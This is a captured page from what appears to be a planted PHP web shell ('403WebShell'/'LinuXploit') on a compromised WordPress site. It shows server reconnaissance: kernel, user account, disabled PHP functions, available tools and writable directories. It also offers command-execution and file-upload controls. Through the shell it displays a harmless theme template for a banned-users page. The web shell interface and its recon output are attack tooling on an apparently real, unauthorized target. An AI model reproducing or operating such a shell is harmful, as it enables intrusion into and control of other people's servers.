AVRIL_START_JANCOKALIVEAVRIL_END_JANCOK Interactive Terminal

Command Executor


Warning: chmod(): Operation not permitted in /www/wwwroot/dzynews.com/wp-content/plugins/fileorganizer/fileorganizer.php on line 8
403WebShell
403Webshell
Server IP : dzynews.com  /  Your IP : 216.73.217.105
Web Server : nginx/1.30.3
System : Linux cloud-tdkldl-avd6 5.15.0-91-generic #101-Ubuntu SMP Tue Nov 14 13:30:08 UTC 2023 x86_64
User : www ( 1000)
PHP Version : 8.2.31
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /www/wwwroot/dzynews.com/wp-content/themes/archive-document/Pages/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/wwwroot/dzynews.com/wp-content/themes/archive-document/Pages/dark-room.php
<?php
/**
 * 小黑屋
 */
get_header();
?>
<div class="b2-single-content wrapper">
    <div id="dark-room" class="content-area wrapper" ref="darkRoom">
        <main id="main" class="site-main b2-radius box">
            <div class="dark-room-header">
                <img src="<?php echo B2_THEME_URI.'/Assets/fontend/images/dark-room.jpg'; ?>">
                <div class="dark-title">
                    <h1><?php echo __('小黑屋','b2'); ?></h1>
                    <p><?php echo __('如果在这里,看到了你的名字,说明你已经被关进小黑屋了!','b2'); ?></p>
                </div>
            </div>
            <div class="dark-room-bar">
                <div class="dark-bar-l">
                    <template v-if="!type">
                        <?php echo sprintf(__('目前有%s个人%s在小黑屋里面壁思过','b2'),'<b>{{data.count}}','</b>'); ?>
                    </template>
                    <template v-else-if="type == 'ls'">
                        <?php echo sprintf(__('目前有%s个人%s在临时禁闭','b2'),'<b>{{data.count}}','</b>'); ?>
                    </template>
                    <template v-else>
                        <?php echo sprintf(__('目前有%s个人%s被永久关禁闭','b2'),'<b>{{data.count}}','</b>'); ?>
                    </template>
                </div>
                <div class="dark-bar-r">
                    <a href="javascript:void(0)" @click="getDarkRoomUsers()" :class="type === undefined ? 'b2-color' : ''"><?php echo __('所有禁闭','b2'); ?></a>
                    <a href="javascript:void(0)" @click="getDarkRoomUsers('ls')" :class="type === 'ls' ? 'b2-color' : ''"><?php echo __('临时禁闭','b2'); ?></a>
                    <a href="javascript:void(0)" @click="getDarkRoomUsers('yy')" :class="type === 'yy' ? 'b2-color' : ''"><?php echo __('永久禁闭','b2'); ?></a>
                </div>
            </div>
            <div class="dark-room-list">
                <div class="button empty b2-loading empty-page text" v-if="data == ''"></div>
                <ul v-else-if="data.data.length > 0" v-cloak>
                    <li v-for="item in data.data">
                        <div class="dark-user">
                            <div>
                                <img :src="item.user.avatar" class="avatar" /><a :href="item.user.link" v-text="item.user.name" class="b2-color" target="_blank"></a>
                            </div>
                        </div>
                        <div class="dark-why">
                            <div class="dark-user-desc">
                                <span><?php echo sprintf(__('在 %s 被关小黑屋,','b2'),'<span v-html="item.start_date"></span>'); ?></span>
                                <template v-if="item.days == 0">
                                    <?php echo __('永久禁闭,不会释放!','b2'); ?>
                                </template>
                                <template v-else>
                                    <?php echo sprintf(__('将在 %s 释放!','b2'),'<span v-html="item.end_date"></span>'); ?>
                                </template>
                            </div>
                            <p><span class="red"><?php echo __('禁闭原因:','b2'); ?></span>{{item.why}}</p>
                        </div>
                    </li>
                </ul>
                <div v-else v-cloak>
                    <?php echo B2_EMPTY;?>
                </div>
                <div class="b2-pd" v-if="pages > 1" v-cloak>
                    <pagenav-new type="p" :paged="paged" :pages="pages" :opt="opt" api="getDarkRoomUsers" @return="getMoreRoomUsers"></pagenav-new>
                </div>
            </div>
        </main>
    </div>
    <?php get_template_part( 'Sidebars/sidebar'); ?>
</div>
<?php
get_footer();

Youez - 2016 - github.com/yon3zu
LinuXploit